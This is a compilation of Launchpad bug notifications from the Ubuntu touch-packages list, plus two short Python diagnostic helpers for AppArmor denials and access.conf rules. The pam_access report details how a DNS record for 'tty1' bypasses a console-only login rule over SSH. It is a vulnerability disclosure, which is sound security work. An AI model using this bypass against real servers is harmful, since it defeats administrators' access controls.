  Fix Released
Status in kdesu package in Debian:
  Fix Released

Bug description:
  kdesu fails to authenticate with sudo from Jammy.

  See upstream bug: KDE bug: https://bugs.kde.org/show_bug.cgi?id=452532

  Examples: Launch Kubuntu driver manager from system setting, launching ksystemlog from the main menu, or trying to run krusader root mode option via its 'Tools > Start Krusader Root Mode' menu entry. Assuming that the current user is a member of the sudo group.

  On entering the correct password authentication is refused, stating that possibly an incorrect password has been entered.

  It appears that kdesu fails to cope with the sudo config change in this commit:

  https://salsa.debian.org/sudo-team/sudo/-/commit/59db341d46aa4c26b54c1270e69f2562e7f3d751

  kdesu was fixed in Debian with:

  https://tracker.debian.org/news/1330116/accepted-kdesu-5940-2-source-into-unstable/

  and fixed in kinetic with:

  https://launchpad.net/ubuntu/+source/kdesu/5.94.0-0ubuntu2

  The issue can be worked around by adding /etc/sudoers.d/kdesu-sudoers with the contents

    Defaults!/usr/lib/*/libexec/kf5/kdesu_stub !use_pty

  [Impact]

   * Users are unable to authenticate to and launch applications via kdesu.

   * This should be backported to restore functionality that users expect.

  [Test Plan]

   * Launch Kubuntu driver manager from system setting, launching ksystemlog from the main menu, or trying to run krusader root mode option via its 'Tools > Start Krusader Root Mode' menu entry. Assuming that the current user is a member of the sudo group.

   * Confirm that the application authenticates and launches as successfully as in previous releases.

  [Where problems could occur]

   * While this update only returns sudo to its default behaviour (used in previous releases and virtually all other distributions) for kdesu, care should be taken to test some other applications that seek root permissions to confirm that no unexpected consequences occur.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/kdesu/+bug/1965439/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2035644] Re: apt status not updated ubuntu 20 LTS
** Package changed: isc-dhcp (Ubuntu) => apt (Ubuntu)

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/2035644

Title:
  apt status not updated ubuntu 20 LTS

Status in apt package in Ubuntu:
  New

Bug description:
  Hi, is this a cache bug? The packages are installed, but "apt list --upgradable" says no, they are not installed.

  root@minion:~# apt list --upgradable
  Listing... Done
  uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20]
  venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1]

  root@minion:~# apt install uls-client
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following packages were automatically installed and are no longer required:
    linux-headers-5.4.0-153 linux-headers-5.4.0-153-generic linux-image-5.4.0-153-generic linux-modules-5.4.0-153-generic linux-modules-extra-5.4.0-153-generic
  Use 'apt autoremove' to remove them.
  Recommended packages:
    libncursesw5
  The following packages will be upgraded:
    uls-client
  1 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
  Need to get 0 B/194 kB of archives.
  After this operation, 0 B of additional disk space will be used.
  (Reading database ... 177475 files and directories currently installed.)
  Preparing to unpack .../uls-client_3.15-7ubuntu20_amd64.deb ...
  redirecting to systemd
  Unpacking uls-client (3.15-7ubuntu20) over (3.15-7ubuntu20) ...
  Setting up uls-client (3.15-7ubuntu20) ...
  Processing triggers for man-db (2.9.1-1) ...
  Processing triggers for systemd (245.4-4ubuntu3.22) ...

  root@minion:~# apt list --upgradable
  Listing... Done
  uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20]
  venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1]

  root@minion:~# apt update
  Hit:12 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-dp-tserver/ Release
  Hit:13 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-dp-tserver/ Release
  Hit:14 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-res-suma-dp-tserver/ Release
  Hit:15 https://SuMa:443/rhn/manager/download luxux-puppet-ubuntu20-x-amd64-dp-tserver/ Release
  Hit:16 https://SuMa:443/rhn/manager/download tvm-standard-ubuntu20-x-amd64-dp-tserver/ Release
  Hit:17 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-updates-dp-tserver/ Release
  Hit:18 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-security-dp-tserver/ Release
  Hit:19 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-universe-dp-tserver/ Release
  Hit:20 https://SuMa:443/rhn/manager/download luxux-standard-ubuntu20-x-amd64-dp-tserver/ Release
  Hit:21 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-updates-universe-dp-tserver/ Release
  Hit:22 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-security-universe-dp-tserver/ Release
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  2 packages can be upgraded. Run 'apt list --upgradable' to see them.

  root@minion:~# apt list --upgradable
  Listing... Done
  uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20]
  venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1]

  root@minion:~# apt upgrade
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  Calculating upgrade... Done
  The following packages were automatically installed and are no longer required:
    linux-headers-5.4.0-153 linux-headers-5.4.0-153-generic linux-image-5.4.0-153-generic linux-modules-5.4.0-153-generic linux-modules-extra-5.4.0-153-generic
  Use 'apt autoremove' to remove them.
  The following packages will be upgraded:
    uls-client venv-salt-minion
  2 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
  Need to get 22.7 MB/22.9 MB of archives.
  After this operation, 0 B of additional disk space will be used.
  Do you want to continue? [Y/n] Y
  Get:1 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-res-suma-dp-tserver/ venv-salt-minion 3006.0-2.35.1 [22.7 MB]
  Fetched 22.7 MB in 0s (76.8 MB/s)
  (Reading database ... 177475 files and directories currently installed.)
  Preparing to unpack .../uls-client_3.15-7ubuntu20_amd64.deb ...
  redirecting to systemd
  Unpacking uls-client (3.15-7ubuntu20) over (3.15-7ubuntu20) ...
  Preparing to unpack .../venv-salt-minion_3006.0-2.35.1_amd64.deb ...
  Unpacking venv-salt-minion (3006.0-2.35.1) over (3006.0-2.35.1) ...
  Setting up venv-salt-minion (3006.0-2.35.1) ...
  Setting up uls-client (3.15-7ubuntu20) ...
  Proc
[Touch-packages] [Bug 2039294] Re: apparmor docker
Are you perhaps mixing Docker packages from one source with Docker AppArmor profiles from another source?

AppArmor policy around signals is a bit more involved than around files:

- The sending process must have permission to send the signal to the recipient
- The receiving process must have permission to receive the signal from the sender

Make sure both your docker-default profile and your /usr/sbin/runc profile have the necessary permissions.

Thanks

** Changed in: apparmor (Ubuntu)
   Status: New => Incomplete

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2039294

Title:
  apparmor docker

Status in apparmor package in Ubuntu:
  Incomplete

Bug description:
  No LSB modules are available.
  Distributor ID: Ubuntu
  Description: Ubuntu 23.10
  Release: 23.10
  Codename: mantic

  Docker version 24.0.5, build 24.0.5-0ubuntu1

  Graceful shutdown doesn't work anymore due to SIGTERM and SIGKILL (maybe all signals?) not reaching the target process. Works when apparmor is uninstalled.

  [17990.085295] audit: type=1400 audit(1697213244.019:981): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172626 comm="runc" requested_mask="receive" denied_mask="receive" signal=term peer="/usr/sbin/runc"
  [17992.112517] audit: type=1400 audit(1697213246.043:982): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172633 comm="runc" requested_mask="receive" denied_mask="receive" signal=kill peer="/usr/sbin/runc"

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2039294/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
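The two-sided signal check described in the reply above, as an added example that is not part of the original message or of AppArmor's own tooling: it parses DENIED signal records and lists, per profile, the rule for the denied side and the matching rule for the peer. It assumes the peer label names a loaded profile (as the reply does for /usr/sbin/runc); the function names are hypothetical, and the printed rules are candidates to review against the profiles, not changes to apply blindly.

```python
import re
from collections import defaultdict

# key=value or key="value" pairs as they appear in kernel audit records.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# A signal needs permission on both ends: send on one, receive on the other.
OPPOSITE = {"send": "receive", "receive": "send"}

# The first two records are the denials quoted in the bug report; the third
# is a constructed file denial, included to show it is filtered out.
SAMPLE_LOG = '''\
[17990.085295] audit: type=1400 audit(1697213244.019:981): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172626 comm="runc" requested_mask="receive" denied_mask="receive" signal=term peer="/usr/sbin/runc"
[17992.112517] audit: type=1400 audit(1697213246.043:982): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172633 comm="runc" requested_mask="receive" denied_mask="receive" signal=kill peer="/usr/sbin/runc"
[17993.000000] audit: type=1400 audit(1697213247.000:983): apparmor="DENIED" operation="open" profile="docker-default" name="/proc/1/attr/current" pid=172640 comm="cat" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
'''


def parse_fields(line):
    """Return the key/value pairs of one audit record as a dict."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def signal_denials(log_text):
    """Keep only AppArmor DENIED records whose operation is a signal."""
    denials = []
    for line in log_text.splitlines():
        fields = parse_fields(line)
        if fields.get("apparmor") == "DENIED" and fields.get("operation") == "signal":
            denials.append(fields)
    return denials


def required_rules(denials):
    """Map each profile to the signal rules both ends of the denial need."""
    grouped = defaultdict(set)  # (profile, access, peer) -> signal names
    for d in denials:
        profile, peer = d.get("profile"), d.get("peer")
        access, sig = d.get("denied_mask"), d.get("signal")
        if not (profile and peer and sig and access in OPPOSITE):
            continue
        # Rule for the profile that logged the denial.
        grouped[(profile, access, peer)].add(sig)
        # Complementary rule for the other end; an unconfined peer has no
        # profile to edit, so nothing is emitted for it.
        if peer != "unconfined":
            grouped[(peer, OPPOSITE[access], profile)].add(sig)

    rules = defaultdict(list)
    for profile, access, peer in sorted(grouped):
        sigs = ", ".join(sorted(grouped[(profile, access, peer)]))
        rules[profile].append(f"signal ({access}) set=({sigs}) peer={peer},")
    return dict(rules)


if __name__ == "__main__":
    for profile, lines in required_rules(signal_denials(SAMPLE_LOG)).items():
        print(f"profile {profile}:")
        for rule in lines:
            print(f"  {rule}")
```

A denial is only logged for the side that failed first, so the peer-side rule may already be present; compare the output with both profiles before changing either.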
[Touch-packages] [Bug 2039541] Re: groupmems prompts for password when run as sudo/root
Nice find. My guess is that the Debian maintainer forgot to include the pam.d configuration file supplied by upstream when this new tool was included: - https://github.com/shadow-maint/shadow/blob/master/etc/pam.d/groupmems - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=663117 We could decide either to: - support the tool properly and include the pam.d file - drop the tool entirely because we've made it this far without anyone noticing, and we made it several decades before someone wrote the tool in the first place - ignore it entirely because it doesn't seem to be hurting anything as it is Properly including the tool might bring with it any security problems that it might have. Leaving it alone probably doesn't bring security problems. In any event we should also file a bug with Debian so they can make a decision, too. Thanks ** Bug watch added: Debian Bug tracker #663117 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=663117 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/2039541 Title: groupmems prompts for password when run as sudo/root Status in shadow package in Ubuntu: New Bug description: When trying to clear users from a group using the groupmems command, the user is always prompted for the root's password, even when running as root or via sudo: (as root) # addgroup testgroup # groupmems -g testgroup -p Password: (via sudo) # sudo addgroup testgroup # sudo groupmems -g testgroup -p Password: I'm not sure if this is desired behavior, but I would expect this command to work without the root password. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/2039541/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045668] Re: Please merge dbus 1.14.10-3 (main) from Debian unstable
usr-is-merged should probably be in main, it serves as an indicator that the system is already using the usrmerge layout. From: https://lists.debian.org/debian-ctte/2022/07/msg00019.html The usrmerge package has been updated to pick up a few fixes from Ubuntu, and most importantly to provide a new lightweight metapackage, usr-is-merged, that can only be installed on merged-usr systems, to provide a way for installers to avoid the additional dependencies of usrmerge when they set up the filesystem correctly by themselves (eg: debootstrap), and for users who already completed the transition. It also gained a flag file that stops the package from updating the system, clearly marked as making the system unsupported. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/2045668 Title: Please merge dbus 1.14.10-3 (main) from Debian unstable Status in dbus package in Ubuntu: In Progress Bug description: 1.14.10-3 Published in sid-release on 2023-10-30 dbus (1.14.10-3) unstable; urgency=medium * d/control: dbus Depends on usr-is-merged (>= 38~). Non-merged /usr has been unsupported since Debian 12, as per Technical Committee resolutions #978636 and #994388 (please see the Debian 12 release notes for details). The version of usr-is-merged shipped in Debian 12 had an undocumented opt-out mechanism intended for use on buildds and QA systems targeting Debian 12 (piuparts, reproducible-builds, autopkgtest and similar), to ensure that the upgrade path from Debian 11 to 12 will continue to work and continue to undergo automated tests. That opt-out is no longer applicable or available in trixie/sid, and was removed in usrmerge version 38. Since version 1.14.10-2, dbus ships its systemd units in /usr/lib/systemd/system, as part of the distro-wide transition away from making use of "aliased" paths. 
This is entirely valid on merged-/usr systems, but will no longer work in the unsupported filesystem layout with non-merged /usr, because for historical reasons, current versions of systemd on non-merged-/usr systems will only read units from /lib/systemd/system. In the case of dbus, the symptom when this assumption is broken is particularly bad (various key system services will not start, with long delays during boot, login and shutdown), so let's hold back this upgrade on unsupported non-merged-/usr systems until they have completed the switch to merged-/usr and can install usr-is-merged (>= 38~). (Closes: #1054650) -- Simon McVittie Mon, 30 Oct 2023 11:51:35 + 1.14.10-2 Superseded in sid-release on 2023-10-30 dbus (1.14.10-2) unstable; urgency=low * Backport packaging changes from experimental: - Install systemd system units into /usr/lib/systemd/system. This was allowed by TC resolution #1053901. The shared library is still in /lib, for now. Build-depend on debhelper 13.11.6~ to ensure that the units are still picked up by dh_installsystemd. - Build-depend on pkgconf rather than pkg-config - dbus-x11: Don't copy XDG_SEAT_PATH, XDG_SESSION_PATH to activation environment. These variables are specific to a single login session. * d/copyright: Drop unused entry for pkg.m4. This is no longer included in the upstream source release since 1.14.6. * d/dbus-tests.lintian-overrides: Drop unused overrides. Lintian no longer flags our RUNPATH as problematic. -- Simon McVittie Wed, 25 Oct 2023 15:56:36 +0100 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/2045668/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045855] Re: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt
There's over 2k instances of errors like this in the terminal log: dpkg: 경고: files list file for package 'libctf0:amd64' missing; assuming package has no files currently installed This is not a happy installation. I recommend a fresh install when convenient. As for the prompt, the history log suggests this was run during an unattended updates run. That'll be invisible to the user. (And, also, I think it's supposed to skip packages that change configuration files, but with a few thousand errors for missing file lists, we shouldn't be surprised that it doesn't work correctly.) Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to bluez in Ubuntu. https://bugs.launchpad.net/bugs/2045855 Title: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt Status in bluez package in Ubuntu: Incomplete Bug description: I did not recognize the error. ProblemType: Package DistroRelease: Ubuntu 22.04 Package: bluez 5.64-0ubuntu1.1 ProcVersionSignature: Ubuntu 6.2.0-37.38~22.04.1-generic 6.2.16 Uname: Linux 6.2.0-37-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 AptOrdering: bluez:amd64: Install NULL: ConfigurePending Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Dec 7 15:44:57 2023 ErrorMessage: end of file on stdin at conffile prompt InstallationDate: Installed on 2021-01-30 (1040 days ago) InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731) InterestingModules: rfcomm bnep btusb bluetooth MachineType: Dell Inc. 
OptiPlex 7010 ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.2.0-37-generic root=UUID=1aa27b2f-8d22-4b4e-931f-bd8e304ed0d4 ro quiet splash vt.handoff=7 Python3Details: /usr/bin/python3.10, Python 3.10.12, unpackaged PythonDetails: N/A RelatedPackageVersions: dpkg 1.21.1ubuntu2.2 apt 2.4.11 SourcePackage: bluez Title: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt UpgradeStatus: Upgraded to jammy on 2023-03-28 (253 days ago) dmi.bios.date: 03/25/2013 dmi.bios.release: 4.6 dmi.bios.vendor: Dell Inc. dmi.bios.version: A13 dmi.board.name: 0GY6Y8 dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 6 dmi.chassis.vendor: Dell Inc. dmi.modalias: dmi:bvnDellInc.:bvrA13:bd03/25/2013:br4.6:svnDellInc.:pnOptiPlex7010:pvr01:rvnDellInc.:rn0GY6Y8:rvrA00:cvnDellInc.:ct6:cvr:sku: dmi.product.name: OptiPlex 7010 dmi.product.version: 01 dmi.sys.vendor: Dell Inc. hciconfig: hci0:Type: Primary Bus: USB BD Address: 00:1A:7D:DA:71:03 ACL MTU: 310:10 SCO MTU: 64:8 UP RUNNING PSCAN RX bytes:1332 acl:0 sco:0 events:84 errors:0 TX bytes:3786 acl:0 sco:0 commands:81 errors:0 mtime.conffile..etc.bluetooth.input.conf: 2020-04-03T15:47:01 mtime.conffile..etc.bluetooth.main.conf: 2020-02-26T18:57:50 mtime.conffile..etc.bluetooth.network.conf: 2012-12-25T02:46:55 mtime.conffile..etc.dbus-1.system.d.bluetooth.conf: 2022-03-24T15:30:38 mtime.conffile..etc.init.d.bluetooth: 2020-02-26T18:57:50 rfkill: 0: hci0: Bluetooth Soft blocked: no Hard blocked: no To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/2045855/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045250] Re: pam_lastlog doesn't handle localtime_r related errors properly
I'm uncomfortable with the idea of printing nothing when the routines fail. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/2045250 Title: pam_lastlog doesn't handle localtime_r related errors properly Status in Ubuntu on IBM z Systems: New Status in pam package in Ubuntu: New Status in pam package in Fedora: Fix Released Bug description: The pam version(s) in Debian (checked buster) and Ubuntu (checked focal to noble) are affected by https://bugzilla.redhat.com/show_bug.cgi?id=2012871 Customers report a command going through PAM crashing for a given user. A potential follow on issue can be that no ssh remote connections to an affected server are possible anymore, esp. painful with headless systems (was reported on a different distro). This is caused by an issue in modules/pam_lastlog/pam_lastlog.c: with tm = localtime_r(...) that can be NULL and needs to be handled. There are two such cases in modules/pam_lastlog/pam_lastlog.c (here noble): 314- ll_time = last_login.ll_time; 315: if ((tm = localtime_r (&ll_time, &tm_buf)) != NULL) { 316- strftime (the_time, sizeof (the_time), 317- /* TRANSLATORS: "strftime options for date of last login" */ -- 574- 575- lf_time = utuser.ut_tv.tv_sec; 576: tm = localtime_r (&lf_time, &tm_buf); 577- strftime (the_time, sizeof (the_time), 578- /* TRANSLATORS: "strftime options for date of last login" */ Case 1 (line 315) is properly handled, but not case 2 (line 576). The second case got fixed by: https://github.com/linux-pam/linux-pam/commit/40c271164dbcebfc5304d0537a42fb42e6b6803c This fix should be included in Ubuntu (and Debian). 
To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu-z-systems/+bug/2045250/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046367] Re: AlphaSSL SHA256 G4 Intermediate Certificate missing
Normally, intermediate certificates are supposed to be included by the leaf certificate owners in their chain of certificates to their roots. It is unusual for intermediate certificates to be included in the CA bundle. GlobalSign has instructions for many applications on their website: https://support.globalsign.com/ssl/ssl-certificates-installation I suspect whatever problem you're trying to solve would be better solved by a site administrator rather than us. What problem are you trying to solve? Why is including intermediate certificates in our CA bundle the right answer for solving the problem? Thanks ** Changed in: ca-certificates (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/2046367 Title: AlphaSSL SHA256 G4 Intermediate Certificate missing Status in ca-certificates package in Ubuntu: Incomplete Bug description: Please add AlphaSSL SHA256 G4 Intermediate Certificate into ca-certificates. https://support.globalsign.com/ca-certificates/intermediate-certificates/alphassl-intermediate-certificates To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/2046367/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046367] Re: AlphaSSL SHA256 G4 Intermediate Certificate missing
Hey Andrey, thanks; I think they've almost got it right -- the Qualys TLS compliance tool says the chain is in the wrong order so it might not work everywhere, but certainly it'll work better than just Ubuntu adding one intermediate: https://www.ssllabs.com/ssltest/analyze.html?d=smsc.kz Thanks ** Changed in: ca-certificates (Ubuntu) Status: Incomplete => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/2046367 Title: AlphaSSL SHA256 G4 Intermediate Certificate missing Status in ca-certificates package in Ubuntu: Won't Fix Bug description: Please add AlphaSSL SHA256 G4 Intermediate Certificate into ca-certificates. https://support.globalsign.com/ca-certificates/intermediate-certificates/alphassl-intermediate-certificates To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/2046367/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046526] Re: pam_access Configuration Treats TTY Names as Hostnames
I wondered if it would look up LOCAL too but figured the reference in the manual to pam_get_item(3) meant that it would special case this one without any lookups. I should have looked at the source instead. I like your idea of using two different files for local vs networked services. (Though that doesn't exactly help with su or sudo, since they can be used by both.) It's not ideal but it's straightforward. ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/2046526 Title: pam_access Configuration Treats TTY Names as Hostnames Status in pam package in Ubuntu: New Bug description: Comments in PAM service files at /etc/pam.d/* suggest a line to uncomment to configure complicated authorization rules using pam_access (which in turn is configured by /etc/security/access.conf): /etc/pam.d/sshd: # Uncomment and edit /etc/security/access.conf if you need to set complex # access limits that are hard to express in sshd_config. # account required pam_access.so /etc/pam.d/login: # Uncomment and edit /etc/security/access.conf if you need to # set access limits. # (Replaces /etc/login.access file) # account required pam_access.so Comments in /etc/security/access.conf indicate the origin in this file can be a TTY or domain name: # The third field should be a list of one or more tty names (for # non-networked logins), host names, domain names (begin with "."), I wanted to configure a user on my server, 'localadmin', who can only log in on the console and not via any network service and tried to achieve this using pam_access as follows: I uncommented the default ‘account required pam_access.so’ lines in /etc/pam.d/sshd and /etc/pam.d/login. 
I add the following in /etc/security/access.conf intending to allow user 'localadmin' to only log in on the console: +:localadmin:tty1 -:localadmin:ALL This seems to work. Login via SSH fails and succeeds on the console, as expected. However, /var/log/auth.log suspiciously indicates it is treating tty1 as a hostname during the failed SSH attempt: Dec 15 01:28:12 server sshd[5868]: pam_access(sshd:account): cannot resolve hostname "tty1" Dec 15 01:28:12 server sshd[5868]: pam_access(sshd:account): access denied for user `localadmin' from `10.0.0.101' It is confirmed to be doing DNS lookups for 'tty1' in the search domain during the login attempt: admin@server:~$ resolvectl status eth0 ... DNS Servers: 10.0.0.2 DNS Domain: example.com admin@server:~$ sudo tcpdump -i eth0 -n port 53 01:28:12.100348 IP 10.0.0.42.44968 > 10.0.0.2.53: 21558+ [1au] A? tty1.example.com. (45) 01:28:12.100666 IP 10.0.0.42.44669 > 10.0.0.2.53: 40453+ [1au] ? tty1.example.com. (45) 01:28:12.103027 IP 10.0.0.2.53 > 10.0.0.42.44968: 21558 NXDomain* 0/1/1 (95) 01:28:12.103027 IP 10.0.0.2.53 > 10.0.0.42.44669: 40453 NXDomain* 0/1/1 (95) I configured my DNS service to resolve hostname 'tty1' to the IP address the SSH connection originates from: admin@server:~$ dig +short tty1.example.com 10.0.0.101 SSH access is then unexpectedly allowed: user@clienthost:~$ ip -4 a show dev eth0 inet 10.0.0.101/24 ... user@clienthost:~$ ssh localadmin@10.0.0.42 localadmin@10.0.0.42's password: localadmin@server:~$ I think the local origins should be completely separated from network origins in /etc/security/access.conf somehow (maybe with separate access.conf files used for local and network PAM services). 
Other requested bug report info: root@server:~# lsb_release -rd Description:Ubuntu 22.04.3 LTS Release:22.04 root@server:~# apt-cache policy pam N: Unable to locate package pam root@server:~# apt-cache policy libpam-modules libpam-modules: Installed: 1.4.0-11ubuntu2.3 Candidate: 1.4.0-11ubuntu2.3 Version table: *** 1.4.0-11ubuntu2.3 500 500 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages 100 /var/lib/dpkg/status 1.4.0-11ubuntu2 500 500 http://archive.ubuntu.com/ubuntu jammy/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pam/+bug/2046526/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
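A way to find rules exposed to the behaviour described in this report: a small lint for /etc/security/access.conf that flags allow rules whose origin is a bare name such as tty1, which the auth.log and tcpdump output above show being resolved as a host name during a network login. This is an added example, not code from pam_access or from the report; the function names and the token classification are assumptions made for illustration, and the sample file is constructed.

```python
import ipaddress

# Origin keywords named in the access.conf comments quoted in the report.
KEYWORDS = {"ALL", "LOCAL"}

# Constructed sample: the first two rules are the ones from the report,
# the last two are made up for contrast.
SAMPLE_ACCESS_CONF = """\
# /etc/security/access.conf (constructed sample)
+:localadmin:tty1
-:localadmin:ALL
+:backup:10.0.0.0/24 .example.com
+:operator:LOCAL tty2 EXCEPT tty9
"""


def classify_origin(token):
    """Classify one origin token by its spelling alone (heuristic)."""
    if token in KEYWORDS:
        return "keyword"
    if token.startswith("@"):
        return "netgroup"
    if token.startswith("."):
        return "domain"            # domain names begin with "."
    if token.endswith("."):
        return "network-prefix"    # network numbers end with "."
    try:
        ipaddress.ip_network(token, strict=False)
        return "address"
    except ValueError:
        pass
    # No dot and not an address: could be a tty name or a short host name.
    return "hostname" if "." in token else "bare-name"


def audit_access_conf(text):
    """Return (line number, users, token) for each allow rule whose origin
    list contains a bare name. Malformed lines are skipped by this lint."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # permission:users:origins -- split twice so the origins field
        # keeps any ":" of its own (IPv6 addresses, X displays).
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        perm, users, origins = (p.strip() for p in parts)
        if perm != "+":
            continue  # only allow rules can grant access through a name
        for token in origins.split():
            if token == "EXCEPT":
                break  # tokens after EXCEPT narrow the rule, they do not grant
            if classify_origin(token) == "bare-name":
                findings.append((lineno, users, token))
    return findings


if __name__ == "__main__":
    for lineno, users, token in audit_access_conf(SAMPLE_ACCESS_CONF):
        print(f"line {lineno}: '+' rule for {users} uses bare origin {token!r}; "
              "a network PAM service may resolve it as a host name")
```

Each finding marks a rule to review wherever the same access.conf is read by a networked service such as sshd, which is the situation the separate-files idea in the reply is meant to avoid.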
[Touch-packages] [Bug 2046633] Re: Don't include 'nmcli -f all con' output in bug report (for privacy)
